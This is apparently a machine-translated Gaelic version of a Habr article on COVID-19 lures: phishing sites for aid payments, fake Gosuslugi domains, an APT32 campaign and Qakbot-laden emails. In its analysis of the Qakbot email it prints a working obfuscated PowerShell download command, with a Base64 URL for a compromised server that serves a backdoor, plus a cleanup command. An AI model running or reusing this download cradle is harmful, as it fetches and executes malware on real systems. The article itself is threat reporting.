Bidh luchd-ionnsaigh a’ leantainn orra a’ gabhail brath air cuspair COVID-19, a’ cruthachadh barrachd is barrachd chunnartan do luchd-cleachdaidh aig a bheil ùidh mhòr anns a h-uile càil co-cheangailte ris an tinneas tuiteamach. ANNS Tha sinn mu thràth air bruidhinn mu na seòrsaichean malware a nochd an dèidh an coronavirus, agus an-diugh bruidhnidh sinn mu dhòighean innleadaireachd sòisealta a tha luchd-cleachdaidh ann an diofar dhùthchannan, an Ruis nam measg, air coinneachadh mu thràth. Tha gluasadan coitcheann agus eisimpleirean fon ghearradh.
Cuimhnich ann an Bhruidhinn sinn mun fhìrinn gu bheil daoine deònach leughadh chan ann a-mhàin mun coronavirus agus cùrsa an tinneas tuiteamach, ach cuideachd mu cheumannan taic ionmhais? Seo deagh eisimpleir. Chaidh ionnsaigh phishing inntinneach a lorg ann an stàite Gearmailteach Rhine-Westphalia a Tuath no NRW. Chruthaich an luchd-ionnsaigh lethbhric de làrach-lìn Ministreachd an Eaconamaidh (), far am faod neach sam bith cur a-steach airson taic ionmhais. Tha prògram mar seo ann dha-rìribh, agus thionndaidh e a-mach gu bhith buannachdail dha sgamadairean. Às deidh dhaibh dàta pearsanta an luchd-fulaing fhaighinn, rinn iad tagradh air làrach-lìn fìor mhinistrealachd, ach chomharraich iad mion-fhiosrachadh banca eile. A rèir dàta oifigeil, chaidh 4 mìle iarrtas meallta mar sin a dhèanamh gus an deach an sgeama a lorg. Mar thoradh air an sin, thuit $ 109 millean airson saoranaich air an robh buaidh ann an làmhan luchd-foill.
Am bu toil leat deuchainn an-asgaidh airson COVID-19?
B’ e eisimpleir chudromach eile de phishing air cuspair coronavirus ann am puist-d. Tharraing na teachdaireachdan aire luchd-cleachdaidh le tairgse a dhol tro dheuchainnean an-asgaidh airson galar coronavirus. Anns a' cheangal so bha amannan ann de Trickbot/Qakbot/Qbot. Agus nuair a thòisich an fheadhainn a bha airson sùil a thoirt air an slàinte “am foirm ceangailte a lìonadh,” chaidh sgriobt droch-rùnach a luchdachadh sìos chun choimpiutair. Agus gus deuchainn bogsa gainmhich a sheachnadh, thòisich an sgriobt a ’luchdachadh sìos a’ phrìomh bhìoras dìreach às deidh beagan ùine, nuair a bha na siostaman dìon cinnteach nach tachradh gnìomhachd droch-rùnach sam bith.
Bha e furasta cuideachd toirt a chreidsinn air a’ mhòr-chuid de luchd-cleachdaidh macros a chomasachadh. Gus seo a dhèanamh, chaidh cleas àbhaisteach a chleachdadh: gus an ceisteachan a lìonadh, feumaidh tu an toiseach macros a chomasachadh, a tha a ’ciallachadh gum feum thu sgriobt VBA a ruith.
Mar a chì thu, tha an sgriobt VBA air a chuartachadh gu sònraichte bho antiviruses.
Tha feart feitheimh aig Windows far am bi an aplacaid a’ feitheamh / T <seconds> mus gabh e ris a’ fhreagairt bhunaiteach “Tha”. Anns a 'chùis againn, dh'fhuirich an sgriobt 65 diogan mus deach faidhlichean sealach a sguabadh às:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Agus fhad 'sa bha e a' feitheamh, chaidh malware a luchdachadh sìos. Chaidh sgriobt PowerShell sònraichte a chuir air bhog airson seo:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Às deidh dha luach Base64 a dhì-chòdachadh, bidh an sgriobt PowerShell a ’luchdachadh sìos an backdoor a tha suidhichte air an t-seirbheisiche lìn a chaidh a ghearradh roimhe às a’ Ghearmailt:
http://automatischer-staubsauger.com/feature/777777.pngagus saoraidh se e fo 'n ainm :
C:UsersPublictmpdirfile1.exe
pasgan ‘C:UsersPublictmpdir’ air a sguabadh às nuair a ruitheas tu am faidhle 'tmps1.bat' anns a bheil an àithne cmd /c mkdir ""C:UsersPublictmpdir"".
Ionnsaigh cuimsichte air buidhnean riaghaltais
A bharrachd air an sin, thug luchd-anailis FireEye cunntas o chionn ghoirid air ionnsaigh targaidte APT32 a bha ag amas air structaran riaghaltais ann an Wuhan, a bharrachd air Ministreachd Riaghladh Èiginn Shìona. Ann an aon de na RTFn a chaidh a sgaoileadh bha ceangal ri artaigil New York Times leis an tiotal . Ach, nuair a chaidh a leughadh, chaidh malware a luchdachadh sìos (chomharraich luchd-anailis FireEye an eisimpleir mar METALJACK).
Gu inntinneach, aig àm an lorg, cha do lorg gin de na antiviruses an t-suidheachadh seo, a rèir Virustotal.
Nuair a tha làraichean-lìn oifigeil sìos
Thachair an eisimpleir as iongantaiche de ionnsaigh phishing anns an Ruis dìreach an latha eile. B’ e an t-adhbhar airson seo a bhith a’ fastadh sochair ris an robhar a’ feitheamh o chionn fhada airson clann aois 3 gu 16 bliadhna. Nuair a chaidh toiseach gabhail ri tagraidhean ainmeachadh air 12 Cèitean, 2020, rinn na milleanan cabhag gu làrach-lìn Seirbheisean na Stàite airson an taic ris an robh dùil o chionn fhada agus thug iad sìos am portal gun a bhith nas miosa na ionnsaigh proifeasanta DDoS. Nuair a thuirt an ceann-suidhe “nach b’ urrainn do Sheirbheisean an Riaghaltais dèiligeadh ris an t-sruth de thagraidhean, ”thòisich daoine a’ bruidhinn air-loidhne mu bhith a’ cur air bhog làrach eile airson gabhail ri tagraidhean.
Is e an duilgheadas a th ’ann gun do thòisich grunn làraich ag obair aig an aon àm, agus ged a tha aon, an fhìor fhear aig posobie16.gosuslugi.ru, gu dearbh a’ gabhail ri tagraidhean, barrachd .
Lorg co-obraichean bho SearchInform mu 30 fearann foill ùr anns an raon .ru. Tha Infosecurity and Softline Company air sùil a chumail air còrr air 70 làrach-lìn seirbheis riaghaltais meallta bho thoiseach a’ Ghiblein. Bidh an luchd-cruthachaidh a’ làimhseachadh samhlaidhean eòlach agus cuideachd a’ cleachdadh measgachadh de na faclan gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, agus mar sin air adhart.
Hype agus innleadaireachd sòisealta
Chan eil na h-eisimpleirean sin uile ach a’ dearbhadh gu bheil luchd-ionnsaigh gu soirbheachail a’ dèanamh airgead air cuspair coronavirus. Agus mar as àirde an teannachadh sòisealta agus na cùisean as neo-shoilleir, is ann as motha de chothroman a bhios aig sgamadairean dàta cudromach a ghoid, toirt air daoine an cuid airgid a leigeil seachad leotha fhèin, no dìreach barrachd choimpiutairean a ghearradh.
Agus leis gu bheil an galar sgaoilte air toirt air daoine a dh’ fhaodadh a bhith neo-ullaichte a bhith ag obair bhon taigh gu mòr, chan e a-mhàin dàta pearsanta, ach cuideachd dàta corporra ann an cunnart. Mar eisimpleir, o chionn ghoirid chaidh luchd-cleachdaidh Microsoft 365 (Oifis 365 roimhe) fo ionnsaigh fiasgaich. Fhuair daoine teachdaireachdan guth mòr “air an call” mar cheanglachan ri litrichean. Ach, b 'e duilleag HTML a bh' anns na faidhlichean a chuir luchd-fulaing an ionnsaigh gu . Mar thoradh air an sin, call ruigsinneachd agus co-rèiteachadh a h-uile dàta bhon chunntas.
Source: www.habr.com